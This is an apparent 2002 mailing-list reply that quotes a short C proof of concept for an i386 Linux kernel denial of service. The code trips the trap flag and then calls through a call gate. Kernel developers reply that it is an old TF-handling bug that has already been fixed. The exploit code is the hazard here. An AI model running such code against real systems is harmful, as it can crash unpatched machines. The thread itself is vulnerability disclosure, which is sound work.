Christophe Devine writes:
> /* USE AT YOUR OWN RISK ! */
>
> int main( void )
> {
> char dos[] = "\x9C" /* pushfd */
> "\x58" /* pop eax */
> "\x0D\x00\x01\x00\x00" /* or eax,100h */
> "\x50" /* push eax */
> "\x9D" /* popfd */
> "\x9A\x00\x00\x00\x00\x07\x00"; /* call 07h:00h */
>
> void (* f)( void );
>
> f = (void *) dos; (* f)();
>
> return 1;
> }
You didn't specify which kernel this was being used against, but
this is what the response from LKML is:
> -----Original Message-----
> From: Alan Cox
> Sent: Tuesday, November 12, 2002 3:10 PM
> To: Christoph Hellwig
> Cc: Leif Sawyer; Linux Kernel Mailing List
> Subject: Re: FW: i386 Linux kernel DoS
>
>
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago
